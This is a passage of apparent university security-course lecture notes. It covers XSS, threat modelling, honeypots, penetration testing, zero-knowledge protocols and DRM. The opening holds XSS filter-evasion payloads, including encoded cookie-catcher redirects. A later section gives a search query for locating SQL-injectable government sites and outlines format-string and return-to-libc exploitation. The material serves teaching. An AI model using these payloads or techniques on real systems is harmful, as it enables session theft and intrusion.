it with a different encoding method, There is always others ways to get around keyword filter, escapes , and other filtering techiniques. The only way to be safe is eliminate all scripting. Here are some examples where things will fail:

<script>a='navi';b='gator.userAgent';alert(eval(a+b))</script> javascript:do%63ument.lo%63ation="http://www.yahoo.com" - the unicode equivalents \u0022 and \u0027 ex: alert("\u0022") or alert("\"") encode a url in hex, so it looks less suspicious cookiecatcher.php becomes %77%77%77%2E%61%62%63%2E%63%6F%6D%2F%63%6F%6F%6B%69%65%63%61%74% String.fromCharCode() attack script: <script>document.location="http://www.yahoo.com"</script> , PHP's magicquotes mean we'll actually get => <script>document.location=\"http:ajsdasdas.com\"</script> To get around this, we can use String.fromCharCode(): <script>document.location=String.fromCharCode(104,116,116,112 Cookie Security (straight from wiki) Besides content filtering, other methods for XSS mitigation are also commonly used. One example is that of cookie security. Many web applications rely on session cookies for authentication between individual HTTP requests, and because client-side scripts generally have access to these cookies, simple XSS exploits can steal these cookies. To mitigate this particular threat (though not the XSS problem in general), many web applications tie session cookies to the IP address of the user who originally logged in, and only permit that IP to use that cookie. This is effective in most situations (if an attacker is only after the cookie), but obviously breaks down in situations where an attacker is behind the same NATed IP address or web proxy. IE (since version 6) and Firefox (since version 2.0.0.5) have an ?HttpOnly flag which allows a web server to set a cookie that is unavailable to client-side scripts but while beneficial, the feature does not prevent cookie theft nor can it prevent attacks within the browser.

User Defense
A user can help reduce his susceptibility to an XSS-style attack : 1. Disable scripting when it is not required. 2. Do not trust links to other sites on e-mail or message boards. They may contain malicious code with damaging potential. 3. Access any site involving sensitive information directly through its address and not through any third-party sites. 4. Get a list of attacks and the sites and boards they happened on and be careful if you need to visit one of them.

Week9/NiceNotes
Threats

Security Engineering Guideline


The following list is a systematic approach to Software Engineering. 1. Assets - Identify the assets you are trying to protect 2. Threat Model - Decide the context you are operating in - general sources of threats, power and motive of attackers 3. Enumerate Threats - detailing the threats against these assets 4. Risks - Assess the risk of each of the threats 5. Policy - Determine a policy that best deals with the risks 6. Implementation - Implement the policy 7. Testing - Test the policy/implementation 8. Training - Train all staff so that they know the policy, and how to react should an attack occur Assets Listing the assets is the important first step in any social engineering exercise. You can only effectively defend something if you know exactly what it is that you are defending. It is very important to make a comprehensive list of assets before you try to start to identify the risks and implement a security policy. Example: Listing the assets for a home Obvious Assets Valuable items Items of sentimental value The people in the house Sensitive data stored in the house The house itself Not-so-obvious Assets The sense of security (the feeling of safety within your house, which would be lost if there had been a break in) The inconvenience of getting your insured items back Example: Listing the assets for an ISP Obvious Assets Hardware Bandwidth Customer lists Not-so-obvious Assets Credibility Possible threats Staff leaking or abusing customer information Other companies stealing and then selling the bandwidth These less obvious assets are often overlooked, and are often more important than the more obvious assets

Threat Models
ISP assets: hardware, bandwidth, customers, customer data, credibility,

reputation threat model: staff can steal assets, bandwidth, sell customer lists, etc Internet Banking assets: money, credibility, money, Money, MONEY! threat model: staff (stealing), flaws in software, hackers obtaining information, ruin records, etc. Developers of system can see flaws and exploit Network Forensics Common Threat Classes This is a non-comprehensive list of some of the common threat classes, not a thorough checklist. Your threat model should include (but is not limited to) the following classes of attacks Users Unintentional attacks (by frustrated or stupid users) Malicious attacks Attackers Casual attackers Does not target this victim specifically Attacks the victim while scanning many other targets Determined attackers Targets the victim Has motive against the victim Tries to find vulnerabilities of the victim Funded attackers Like determined attackers, but also: Performs reconnaissance Hires people and purchases equipment to perform the attack Natural disasters / accidents Errors and Failures Mechanical Human: Humans have specific abilities and inabilities at performing tasks that should be considered when determining the risk of the humans failing in their task. In particular, humans are good at performing tasks that are: Simple Familiar or Common - Humans are more likely to notice and fix mistakes if they are familiar with the task, and the feedback that results from it Motivating, but without pressure - Motivated humans are likely to put in more effort to prevent failures. Under pressure though, humans do not act rationally, and ignore warning signs. Give clear feedback - Humans are good at analysing feedback in order to prevent failures What happens when the red light goes on for the first time? Ambush run towards the people who are ambushing you; if you run towards them, might cause them to panic since they probably won't expect you to run

towards them Minefield just all freeze and wait for help to come Ambushed & Minefield run towards the attackers; some maybe killed by mines, but all will be killed by ambushers if freeze Change Environmental (e.g. bank keycards, online apps) Organisational (e.g. new systems, merger or takeover) Requirements (e.g. millenium bug) Threat trees Tunnel revenue Schneier calls Attack Trees Dealing with threats The greatest threat to security engineering is humans. How do we defend from people going bad? Who will watch the watchers? Solution: DUAL CONTROL This involves distributing trust, by requiring 2 or more independent people to go bad before the system can be compromised. Examples of Dual Control: 1. Double entry used in book keeping - Credits and debits are entered by 2 separate people. Because total credits must equal to total debits, if they don't balance out, then it is apparent that at least one person has been compromised. 2. Ice cream shop - An ice cream shop required the customers pay for tickets at the cashier first, before swapping the tickets at the ice cream service place. The staff are told that this is for hygiene purposes. The real reason is for security reasons. At the end of the day, the number of tickets sold at the cash register must equal the number of tickets collected at the ice cream service place. This is a dual control. 3. Government The Australian government powers are separated into 3 groups, legislature, executive and judiciary.The three groups were originally kept independent of each other, so that each group can check other groups without being interfered or influenced by the other groups. Under the Howard government, the legislature has gained significant power over the judiciary, being able to sack and decide the salaries of the judiciary. This definitely has impacted on the judiciary's ability to carry unbiased checks and balances on the legislature group. Do countermeasures actually reduce the real threat and/or it's impact? Does this reduction improve the security of what you want to protect? Zero Knowledge Protocol is an interactive method for one party to prove to another that a (usually

mathematical) statement is true, without revealing anything other than the veracity of the statement. Example: A man and woman reach a circular cave that has a password secured door: The woman knows the password and wants to sell it to the man. The man wants to buy but must verify that she does know it. Woman needs to prove to him without telling him the password, hence zero knowledge protocol. Solution: The woman goes to either side without the man knowing. The man then asks her to come out a particular side, she will then come out that side. By repeating this many times, the man will be convinced she knows the password as she has appeared out the right side each time he asks. Proof: If we had a video recorder recording the whole process: the man will be convinced that woman knows the password. However no one else will gain anything from this video as both man and woman can modify this video to make it indistinguishable from a fake.

Honeypot
What is a honeypot
It is a trap set to detect, deflect, or in some manner counteract attempts at unauthorized use of information systems. It is basically some fake data on a system or a fake system on a network, or a fake network altogether which shouldn't receive any traffic from normal users. So if these honeypot data/systems receive traffic then an intruder is in the system/network.

Types of honeypots

Honeytokens Honeytokens are honeypots that are not computer systems. In other words, it's some type of digital entity (not a whole computer system) that defenders want attackers to interact with. They are generally used not to monitor attacks, but are to be used in attacks to determine if an attack has taken place. Example A file in a PC that shouldn't receive any form of interaction (e.g. reads or writes to the file) has been modified. This means an intruder has accessed or modified the file in some way. Such as a credit card number, spreadsheet, or even a fake login. Honeynets Conceptually, these are a network of one or more honeypots. They function in the same way as a normal honeypot, but at a larger scale since it's a honeypot network. Example Honeynets can be made up of low or high interaction honeypots such as a network of HoneyD honeypots. However, typically in the real world, high interaction honeypots such as real system honeypots are used in honeynets. Honeypot Clients Unlike other honeypots that are passively waiting to be attacked, honeypot clients are actively looking for attackers. In this case, looking for malicious servers that attack clients. High interaction These are honeypots that do not emulate actions since they are real systems that have entire operating systems and applications. As a result of high interaction honeypots using real systems, they can capture vast amounts of information and provide the attacker with an environment where they can gain access to the operating system and perform their malicious tasks. Once the attacker is within the honeypot, the defender can do things such as: capture the attacker's rootkits as they are being uploaded into the system capture their keystrokes monitor communications between the attacker that is attacking the system and other attackers This leads to defenders being able to find out the attackers' motives, skill levels, organisation and other critical information. Another advantageous use for high interaction honeypots is that they are able to be used to detect new types and forms of attacks and exploits. Additionally, these can be used to distract intruders from other sensitive systems. However, all the advantages that high interaction honeypots provide, come at a price. Since high interaction honeypots run real operating systems, attackers can use these honeypots to perform attacks on non-honeypot systems. Also, setting up and managing high interaction honeypots is complex where the defender has to configure all the services on the system and setup some form of logging or whatever they are using the honeypot for. Furthermore, complexity is added when the defender attempts to minimise the risk of the honeypot becoming a part of the attackers attacks.

Example Virtual-world - VMware running a virtual operating system Real-world - Undercover police/agent Low interaction Low interaction honeypots are systems that emulate real-lfe systems and services and log the activity associated with these systems and services. The advantage of this is that the attackers activities are contained to what the emulated services can do. In most cases, attackers will be limited to connect to the honeypot and execute a few commands (compared to being able to run all available commands in a real system). These types of honeypots are typically easier to setup and run. They also usually come preconfigured or preloaded with extra modules and options which emulate various systems and services. Unlike high interaction honeypots, low interaction honeypots have a lower risk since (as stated before) the attacker is contained within the emulated system/service which limits what they can do. This means that attackers have no real operating system to upload rootkits to or break into real services. Unfortuneatly, there is a draw back to the amount of information that low interaction honeypots can gather as a result of the limits that are imposed onto the attacker. Another draw back with using low interaction honeypots is that the emulated services only work well with known or expected behaviour and actions. Therefore, when unknown or unenexecpted behaviour is encountered, the honeypots ability to understand, respond and capture decreases. Example Virtual-world - HoneyD Real-world - hidden security system (e.g. hidden security cameras, tamper alarms etc)

Uses of Honeypots
Research Research honeypots are used as a research tool they gather information about the motives and tactics of the Blackhat community targeting different networks these do not add direct value to a specific organisation they research the threats organisations face, and to learn how to better protect against those threats Research honeypots are complex to deploy and maintain, capture extensive information, and are used primarily by research, military, or government organisations Production Production honeypots strengthen an organisation's security system. Their main aim is not to prevent intrusion but to act as a support system to other security systems. used in companies/organisations capture only limited information Production honeypots are placed inside the production network with other production servers by organisation to improve their overall state of security to help mitigate risk in an organisation adds value to the security measures of an organisation for example using honeyd to use unused IP address space to create fake systems to detect and distract intruders

Detection Used with IDS Response Examples: having fake systems on the network that should not get activity, Bait Cars (presidential limos) Deterrent Examples: Car Alarm LED, Alarm Stickers, Fake Cameras Distraction Have the attacker play with the fake honeypot while you take defensive measures Examples: Bait Car under attack

Discovery of Honeypots
Social Engineering OS Fingerprinting Response Times Assembly code Honeyd Honeyd is daemon (background service) that runs virtual hosts over a network. It can be configured to simulate multiple servers and network devices on a network. Honeyd allows one host to claim multiple IP addresses to simulate network devices. Honeyd has two main purposes To detect intruders So you can have a handful of real devices on a network, say 2 servers and a printer Honeyd can be used to spawn many fake servers and printers on the same network using those unused IP addresses These can be configured to merely log traffic An intruder may try to access these fake devices, and honeyd will log the activity These devices should not receive any real traffic So if they do receive traffic, that means an intruder is in the network To distract intruders Again you have honeyd spawn a bunch of fake servers and other devices Configure these fake devices to respond like a legitimate device The intruders sees many servers and printers and they all look real The intruders will need to find out which server is a honeypot in order to avoid being trapped This buys the company time to take defensive measures such as backing up files, closing ports, moving files away Honeypot at Home: Log file Remember Richard's sniffer at home? thats a honeypot A PC setup to log and not interact with anything Out of curiousity and epic boredom I decided to see what happens to an undefended XP System (yes I need to get out more) So, I've setup one system at home to see if anything is trying to access my

system for no legitimate reason It was running Windows XP (SP0), with shared files and folders, XP firewall turned off OK, now I installed wireshark on it and hooked it up directly to the internet (modem into network card) Most of the traffic is DHCP, the machine, from what I make of it, seems to broadcast its existance continuously I started IE6 (which loaded the runonce MS page by default) and then went to google in about 5 to 10 minutes, ?NetSendMessage issues a command to my computer to display a popup within 10 minutes I was attacked by what looked like the blaster worm (or at least I think it is) My computer was forced to shut down in 1 minute when restarted, I received more SPAM pop-up messages and another shut down command I installed XP SP3, now this did not get any pop-up messages or any worms I still get the packets trying to activate the spam messages but no pop-ups were seen though it was only left running for half an hour, because I got bored and wanted to use the internet... Then I decided to run the system with XP SP0 while I was at uni, so I did and for some reason I did not get any forced shut downs before setting up the system I was expecting to be forced to shut down with in 5 minutes using XP SP0 on the internet (this happened frequently back in the old days when blaster worm was set loose) after reading up on sasser worm on wikipedia, mentioned was ISPs filtering out these worms I reckon that such infrequent attacks by blaster/sasser on my system are probably due to a decline in using XP SP0, as MS doesn't support SP0 any more Setting something like this at home is quite easy just get any random old computer off the streets Install your favourite Operating system on it hook it up to your modem let it run for an hour My WS log

Week11/NiceNotes
What is it like to work as a penetration tester?
penetration testing auditing for PCI high level policy reviews product security assurance testing Guest speaker: Fionnbharr Davies ( Securus Global), graduated last year from CSE Penetration testing Companies hired us because they have to be secure! For example, Banks providing credit card service are required to meet the PCI (Payment Card Industry) compliance.

Medical companies In the real world, no one likes to have their security checked and tested. They only do it, because they have to! Many companies just want to be canned for vulnerabilities on their IPs, firewalls Other: Sometimes, hired for instant response malware Microsoft SQL server stack overlow What companies care about: Consequences of the vulnerability; Likelyhood of it being exploited; Is it fixable, and if so, the cost of fixing it. Clients are often security teams in the companies who spend most of their days liaising with various departments but gets very little done What penertration testers care about: How to exploit the systems? What are the vulnerabilities? Tyes of Penetration testing jobs PCI compliance (too boring to talk much about it) Web apps -- majority of jobs check it out and find vulnerabilities many contains easy to find holes, e.g. XSS; SQL injection attacks such as: a quick search on google using "inurl:select inurl:where site:gov" reveals a bunch of government sites vulnerable to SQL injection web app developers are lazy, usually forget to parametrise input fields. For example, A web app uses javascript to get user IP and user name then stores info in a cookie. <= can easily inject xml to modify the user name reverse engineering - rarely, mainly involves malware network penetration testing need lots of knowledge about network, and current vulnerabilities - joining a mailing list and read it is a great way to keep up to date internal web app on servers are usually vulnerable to be exploited to give root access often you can take one thing and use it as a leverage else where for example, take a user name for one app and try to brute force it on another application on the same server, or server on the same local network - most of time, it will give you access application/software reviews Example: A gas station has a number plate scanning program, which can be exploited by scanning SQL injection code printed on a number plate "Security software" is often written by developers who just happen to write security software In other words, don't trust anything! Example: formatted string bugs - printf with % sign have known vulnerabilities, where you allow users to specify customer formats using printf, you are exposed to the vulnerability. %x pops first thing off the stack -- can use it to pop anything you want! %n write to arbitrary spots ... Classic case -- a server allowing you to telnet it, which can then be explored using formatted strings and let you take over the machine For a penetration tester, ones you've penetrated the system then its

game over! The iPhone job Concern: "What data can be pulled off if you lose the iPhone?" Answer: (in short) Everything! Some vulnerabilities: dynamic keyboard cache (.dat file) -- stores everything you've typed in the past few days. Yes, passwords are stored!! keeps track of everyone you've called and all of your photos every time you push the big round button at the bottom or use zoom, it takes a screen shot of your display and stores it! upon deletion, objects are not removed, merely marked as being 'deleted' the pin can easily be bypassed - it's stored in a file. if you would like to try and confirm this, try searching for files using magic numbers in file headers. Common examples, %pdf - pdf files elf - elf files How do clients establish trust with Securus Global? if anything goes wrong, they will look to the company first reputation - company has been around for a while

Fuzzing
random data is generated and fed directly into a program, the aim being to cause a crash simple and effective way to expose vulnerabilities, e.g. buffer overflows sometimes it can get fairly complex block based fussing, e.g. Samba break things into blocks e.g. header, data 1, data 2 etc given length field info and block of data, use fussing engines (e.g. Sulley, Spike) to generate data feeds allows you to be selective about what you want to fuss

Open source vs Closed source


64 bit os - makes exploitation a lot harder many applications haven't been attacked yet, it doesn't mean they are not vulnerable for a black hat, it is always about the economy Mac OS has formated string vulnerability Stack should be made either writable or executable but not both can be by passed by return to libc attack

Universities are 5 years behind


BH/DC talk on ret-to-libc search for pop and ret in disassembled code jumps to various places using pop and ret, to create a little program on top of a big one

Miscellaneous
ubuntu remote root access bug redhat backporting vulnerability

Conclusion
You are always owned! Don't trust any one! Hackers always have access to the source code Usability is the opposite of security For those who are instersted in security, check out paper and presentations on immunity. In particular, The hacker strategy, March 28, 2008 IO immunity style, Feb 29, 2008 insecure.org & internet superheroes

Protocols (continued) and policy


A way of doing encryption, using keys or hash functions are called primitives. These primitives are building blocks for secure systems when they are bound together using appropriate protocols.

Non-repudiation
You cannot take anything back. This is a property of a protocol whereby: Everyone can clearly see what is going on If the protocol fails (eg Authentication) everyone can see it fails If the protocol succeeds, then everyone can see it You cannot change the status of the success or failure after-the-fact.

Protocols of Election: Properties


The question: What properties would you require in an electron voting system? Answer: Verify each person voted Cannot identify who voted for which candidates Ensure each person voted once Ensure only eligible people voted Ensure each vote was counted once Preserve anonymity Verify the result of the election was correct a vote is counted and counted once only results must be verifiable by a third party Example: Requirements for a protocol Question: Colonel Jack O'Neill has become invisible (technically 180 degrees out of phase). To be able to be seen again he needs to communicate with the members of SG-1. The only person who can see Jack is an untrusted 3rd party - lets call him Bob. What properties do you need in a protocol to ensure that Jack can communicate to the SGC? Answer:

Authentication - you can verify that it is Jack Integrity - The message cannot be be changed in transit Confidentiality - Bob cannot understand the contents of the message Non-repudiation?? Pre shared knowledge resolves the authentication issue, e.g. C: "What did we do last week?" A: (via Bob) "We sent skiing with one leg tied up our back!" Flaws in Australia Election Everyone can get a copy of every vote in a DVD Flaw: you can work out if someone has voted it for a candidate e.g. vote for xxx, then number the other 50 candidates in a certain way <the chances of someone else in Australia using the same arrangement is low! Example 2 2005 final exam, q3 Property of protocol: authentication non-repudiation the protocol must be fair to both sides if the medium did contact Houdini, then there is no way Bess can deny it if the protocol failed, then medium cannot contact Houdini neither party can back away from the truth this is the major difference between this and Example 1 you may also mention integrity and confidentiality as long as you can justify them Possible protocols: pre-shared secretes, say an envelope with 10 keys -- what if you had 10 fake medium and one real one? secrete is held by trusted third party in order for non-repudiation, 3rd party must review each secrete key as they are tested and say it is correct or not something they have lead box of 50 dice, shake and let medium guess time bomb on Bess, only Houdini can tell the medium how to solve it what if medium is a fake? what if medium pass doesn't pass on the solution This question really wanted you to come up with something that shows you've thought about the issues involved and are tackling them. More on repudiation If Richard will give you a HD, you will give Richard a big bribe Richard: hash document saying he will give you HD and produce document' by signing the original and the hash with his private key You: hash document and decrypt document' using Richard's public key Provides integrity but no non-repudiation, Richard can claim that his private key is stolen Adobe updater

update servers can be faked by using tools available on the net which exploits the latest vulnerability of DNS spoffing

Zero-Knowledge Protocol
A Zero Knowledge Protocol (aka 0K protocol or ZK protocol) is essentially a protocol that allows one party (the Prover) to prove the validity of an assertion to another party (the Verifier) without revealing anything else (i.e. without leaking any other information) to a third party who should not be able to obtain any information involved within the process of the protocol. After the protocol is enacted, no one should have been able to learn anything apart from the purpose of the protocol. It is guaranteed that no extra info leaks out. no one can learning anything extra apart from what we want to get through no side channel attacks can be launched i.e. extra information leaked Proof: If communication of the protocol between two parties could be faked such that an observer could not tell the difference from if the real protocol was used, then no knowledge is given away by the protocol. It is also important to realise Zero Knowledge protocols involve an asynchronous relationship between the Prover and Verifier. As well as a third party not being able to gain any extra information, the Verifier should not have the ability to obtain any more information than the Prover intends. 0K protocols are probabilistic (rather than deterministic) in nature. That is, the Verfier would ask a number of questions and the answers to these depend on the Prover knowing some information. Then if the Prover answers them all correctly, the likelihood of them not knowing the information in question is negligible. On the other hand, if the Prover does not know the information, then it is not likely that they will be able to answer the Verifier's questions correctly. In terms of 0K protocols, we are mainly concerned with Passive Cheaters as they are the most difficult to prevent from accessing information. So, we basically want to ensure that no information can possibly be leaked from the protocol that a passive cheater can get their hands on. Why must the transcript of the protocol be fakable? (This is just stating the above again in a different way.) So that we can prove that no extra information is leaked. If the transcript is fakable then any transcript of the protocol cannot possibly convince anyone of anything, because if you look at any transcript you cannot determine if it is real or not. Therefore a transcript does not leak any information. If it is NOT fakable then a transcript of an honest Prover may be distinguished from a transcript of a cheating Prover. While the real transcript still proves the claim, we cannot prove that it leaks no extra information.

Transcript of protocol
A transcript of protocol is a record of the interactions that occurred during the protocol.

Modes of operation
There are a few ways in which 0K protocols can work: Interactive This is where the Prover and the Verifier go through the protocol one step at a time and then repeat the process until the Verifier is satisfied. Most of the examples in the following notes are of this form. Parallel This is where the Prover creates a number of problems and the Verifier asks for a number of solutions at the same time. This saves time compared to the previous mode since you do not have to go through the steps one after the other. Offline This is where the Prover creates a number of problems and puts them and the data through a public one-way hash function. The result is then used to generate a set of random solutions required. This is effectively automating the role of the Verifier. The Prover can then attach their solutions to the message.

Example
Let's suppose you knew how to create a website so that it would get to the top of Google ?PageRank and now you want to sell this as a service to your clients. Your clients may not believe you and want proof that you can actually get to the top of ?PageRank before they give you any money. One way you could show them that you can do what you claim would be to create a website that would demonstrate it. But, once you show this to your clients they may be able to get some extra information from it (such as what you have included in the page) which may help them do the same thing on their own, without having to pay you. If your clients were to do this, they may be considered passive cheaters. You want to be able to prove to people you can do what you claim but without giving them any extra information. This is where 0K protocols come in.

Example
Given 2 graphs, prove they are isomorphic without revealing the isomorphism. E.g. P has a graph G and V has a graph T. V will give P a billion dollars if P can prove G is isomorphic to T. P does not want to reveal the isomorphism to V. 1. Take G and apply transformation a to produce G', G' can then be transformed to T applying transformation b. 2. V can then ask to choose either a or b 3. Repeat step 2 (each with a new isomorphic G') Note: it can be easily faked by P knowing sequence ababbaaaabbb and then produce G accordingly A 3rd party cannot tell if the sequence is a fake. G & T are not secrets.

DRM What is Digital Rights Management


Previously, we had analog technologies such as a cassette or VHS tape. If you made a copy of a cassette or VHS tape, there was some degradation in the quality of the music or video, and there was also some cost involved. It was not practical (or even possible) to make millions of copies of a single tape and distribute it throughout the world. As we have moved from analog to digital technologies (and with the introduction of the internet) the ease at which a we can copy and distribute content has dramatically increased. Making copies of content has essentially become free. Obviously, this doesn't sit well with the big music and movie companies who want to protect their content. Hence, several schemes to guard against the unauthorised copying and distribution of these products have been created. This is what has come to be known as digital rights management or DRM. DRM is a class of technologies that allow rights owners to set and enforce the terms by which people use their digital content. Rights owners are typically copyright-holding companies like music, film, book or software publishers. The first generation of DRM really only sought to control the copying of content. But increasing these days, second generation DRM attempts to control viewing, copying, printing, altering and basically anything else you can do with digital content. Rights owners use DRM to associate 'rules' to content that control how documents, music, movies, entire software programs, or even e-mails are used.The aim of DRM is to support the secure promotion, sale, and delivery of digital content. Some of the more notable DRM schemes include: Apple's FairPlay (protects AAC files) Content Scramble System (CSS) (protects DVD-Video) Advanced Access Content System (AACS) (protects HD-DVD). Windows Media DRM. DRM relies on encryption to protect the actual content and authentication systems to ensure that only authorised users can unlock the files.

DRM System
Obviously, DRM is not much use on a single device! There isn't much point in controlling your own access to content you create on your own computer. Therefore, DRM is usually used in a wider system that allows users to purchase content, and then controls users' access to that content. A high-level view of what such a DRM system may look like is:

A Case Study - FairPlay (Apple iTunes Store)


How it works
In order to use the iTunes store, you need to sign up with Apple for an iTunes store account. This account must be associated with an "authorised" computer running iTunes. Each authorised computer has a globally unique ID constructed from the hardware on that computer (MAC address/hard drives/etc - varies on Mac/Windows)

When you buy a song, iTunes generates a "user key" and sends it to the store. The store encrypts the song with a "master key" and sends you the song, then iTunes (the client) encrypts the song+master key with the user key. Both the client and the store save the user key and associate it with the account. Note that the main encryption process occurs on the client computer - this eases the load on Apple's servers. In order to play the song, iTunes looks up the associated user key, uses this to decrypt the master key, and then uses this to decrypt the actual content.

Each new purchase generates a new user key, which again is stored locally & on the store servers. If you authorise a new computer (you can have up to 5 per account), the store server associates its unique ID with your account, and then sends a copy of all the user keys associated with the account. If you deauthorise a computer, the unique ID is removed from your account, and the iTunes client deletes all user keys associated with the account. (If you backup your key file before deauthorising the computer, you can later restore it and end up with more than 5 authorised computers! This starts to get impractical if you keep buying new songs though.)

If you have an iPod, when you connect it to iTunes it simply copies all the keys for the songs you copy to the iPod. The iPod was deliberately simplified with the complexity again delegated to iTunes. This is why if someone connects their iPod to my computer, all their music will be deleted & replaced with mine.

Attacks on FairPlay
The iTunes store as a whole is a closed system - iTunes is obviously closed-source and Apple does not publish any details about the interaction between iTunes & the store. This makes it inherently difficult for attackers, as they must use reverse engineering to learn how it works. Further, it is a changing target. Apple frequently updates the store and the client, partly to close loopholes that have been discovered and exploited. They are also able to force users to upgrade the client, eg by preventing users of old versions from purchasing new content or authorising computers. So far, there is no method to decrypt an arbitrary song, however there have been several methods of removing the DRM from songs that the user does have access rights for. These are, in rough chronological order: QTFairUse/ PlayFair/ Hymn/ JHymn (all similar/related) - intercepts the AAC data stream as it is sent to the sound card PyMusique - iTunes client for Linux, impersonated iTunes & connected to the iTunes store & downloaded files. Unfortunately, they forgot to write the bit that encrypted the files client-side, causing Apple to shut them down! FairKeys - impersonates iTunes, using unique computer ID, and requests keys for previously bought content.

Requiem - decrypts the local iTunes key file, and directly decrypts files using

the keys therein. Does not remove personally identifiable information from the file, so it would be unwise to share these files publicly, even though it is technically possible for others to play them. Note that none of these currently work in the recently-released iTunes 8. Requiem works for all versions prior to 8, and the developer has publicly stated that he is working on iTunes 8 compatibility.

Problems with DRM


1. One of the most significant problems with DRM today is its proprietary nature and lack of widely accepted standards. If I download a song through iTunes, I can play that song on my iPod but I can't take that song to a Sony MP3 player and expect it to work. If a set of standards were to be established, and widely accepted, then it may be possible to take content and play it across many different kinds of device. 2. The proprietary nature of DRM creates another issue. The DRM solutions that individual companies create fail more often than not, partly because they generally rely on keeping parts of their algorithm a secret. As we have previously discussed in class, one of Kerckhoffs' principles for the security of a cryptosystem is that it should not rely on keeping the algorithm a secret, and Richard has talked about the benefits of a peer reviewed algorithm. An example of a DRM cryptosystem that failed (spectacularly) upon it's method being revealed is the Content Scramble System (CSS), which still exists on most DVD's today. 3. As discussed in earlier lectures, when a security system loses the sympathy of the average user then people are inclined to undermine that security system at every given opportunity. 4. Below are some examples of DRM systems that have caused harm to legitimate users.

When DRM Goes Bad


Sony rootkit In 2005, Sony included a DRM program on music CD's that automatically installed on the users computer. This program allowed other malicous code to execute on the users computer, and experts stated that the program was identical to that of a rootkit (and hence it became known as the 'Sony rootkit'). Sony were force to recall these CD's (over 2 million sold). MSN Music When MSN Music shut down users lost the ability to move their music to other computers or devices or to format their computers (and keep the music), as they are no longer able to get authorisation keys. ?VeriTouch iVue Media Player ?VeriTouch iVue Media Player is a linux based MP3 player. In order to solve the problem of the users having physical access to the device (a significant advantage to the would-be attack) this player erases all data if it detects someone trying to open the box.

Attacks on DRM
Attack Methods
The type of attack method varies widely from DRM scheme to DRM scheme. This is due to the nature of DRM i.e. proprietary. One of the main weakness of DRM is that

you are often required to place the software/hardware in the user's environment, and hence the attackers often have physical access to the security system. Analogue Hole Jon Lech Johansen once said that "If you can hear the music, if you can see the picture, you have been given the means to decrypt the once-encrypted information. Whatever your ears can hear and your eyes can see can certainly be recorded again, without encryption, by electronic means". The analog hole was a term coined by the Motion Picture Association of America (MPAA) to refer to the vulnerability in DRM protection schemes that allow anyone with the right software and/or equipment to re-record analog content into digital format. The quality of the reproduction can vary radically with the method of re-recording used. For example, if you got a mini-DVD camcorder and sat in a movie theatre to record a box office movie being played, then the quality of the reproduction is going to be significantly lower than the original film. But let's say you use iTunes to re-record your DRM protected content to CD and then rip it back on the computer into a DRM free format. There will be some loss of quality, but it is fairly minimal. The so called analog hole is a significant concern for the creators of DRM protected content, so much so that in the US the MPAA has lobbied the government to introduce legislation to regulate analog-to-digital conversion hardware (ADCs). The movie industry want all ADC hardware to carry a technology to detect and refuse attempts to copy protected content, so far these bills have failed.

E-Books, PDFs and Word Documents


DRM employed as a means to protect the authors intellectual property - it can prevent people who purchase or are given documents from modifying the files without permission. Similarly, it prevents unauthorised redistribution of these files. Some methods of employing DRM on documents include: Phoning home. Registering files to computers and accounts Click-wrap licensing (like EULA's) Proprietary hardware/software combinations. eBooks There's a large variety of eBook formats that have been produced but the ones commonly thought of are the ones provided by Amazon.com and those that are read by Microsoft's Reader. DRM is employed in some eBooks by pairing proprietary formats with dedicated readers or hardware. Some of these devices phone home which allows the use of the eBooks to be tracked along with the purchasers reading habits. Other DRM methods are simple "click-wrap" licenses which restricts the users rights to distribute or use freely in the public domain. eBooks sold by Amazon.com are in a format supported by their Kindle device - an embedded system used to read AZW files. AZW files employ their own proprietary DRM scheme. Part of the terms and use of Kindle is the disallowed transfer of eBooks to other people or other Kindle devices. Microsoft's Reader naturally uses its own proprietary format, called .lit (standing for literature) which is an extension on the old CHM format. It employs copy-protection of DRM'ed eBooks by allowing users to read them only on Reader programs that are tied into their Microsoft Passport account. The limit is 6 but it is possible to individually request additional computers to be added but it is up to Microsofts discretion. Which leads to the general criticism of eBooks. They're meant to be alternatives to the

traditional paperback but the limitations of DRM and associated licenses remove the freedom of use with an ordinary paperback. It isn't so simple to lend an eBook to a friend - in fact, if you did you may well be sued if the publisher found out. This leads to why eBooks have not been terribly successful especially with the coupling of proprietary formats and proprietary readers. Which may also be why many these DRM schemes have not been hacked or cracked - there's not a "market" for it. PDF's As of this year, officially an open standard. As a standard it defines 40-bit and 128-bit encryption schemes using RC4 if a given document were to be encrypted. PDF files can also be embedded with DRM schemes that limit viewing, editing and printing of the document. But this is entirely dependent on the reader obeying the scheme. A solution provided by various companies is to provide an encryption scheme and a special reader - one example is DRM-X provided by Haihaisoft. Toted to be "The World's Most Powerful DRM." They provide a means to limit viewing, editing and printing through their own encryption scheme and their own proprietary reader. Through an ActiveX control, the PDF is encrypted for the user. A username and password combination are required to open the file in the Haihaisoft PDF Reader. Word Docs Since Microsoft Office 2003, users have been provided with the ability to secure their documents in a similar fashion to PDFs. In addition to this, they can add time limits to the files and assign specific groups and users to which they can access the file. Cracking and Hacking The key mains of circumvention of DRM protected documents is the analogue hole. Main "attacks" have been to take screenshots (or print and rescan) of the documents and feed them through an OCR program. If an employed scheme involves a basic password encryption, brute-force attacks are possible. One Russian Company, Elcomsoft, provides various password recovery programs that include bruteforce, mask, dictionary and key index attacks.

Trusted Computing & PS3's


Trusted Computing is an ideal that seeks to establish end to end security. Of course, this involves both hardware and software aspects and requires collaboration between various industries. Quite often, software engineers write robust protection schemes, while computer engineers fail to secure communications or other potential points of eavesdropping. Trusted Computing seeks to prevent a multitude of attacks by both securing the system from external attackers, and from users themselves. In doing this, Trusted Computing prevents social engineering, and eavesdropping. Of course, in order to guarantee a secure platform, Trusted Computing relies upon access control lists, and a piece of hardware kit called the Trusted Platform Model (TPM). The TPM is meant to uniquely identify machines and securely implement encryption schemes. Trusted computing is underpinned by five important concepts: Endorsement Key Allow systems to establish unique identities. Thus tying content to specific users on specific machines. Secure Comms Allows for secure exchange of data. Memory curtaining - Full isolation between user space memory and sensitive areas of memory. Sealed Storage - Using the machine and users unique identity, all private information will be readable only with the exact same setup. This both protects information and binds it to users.

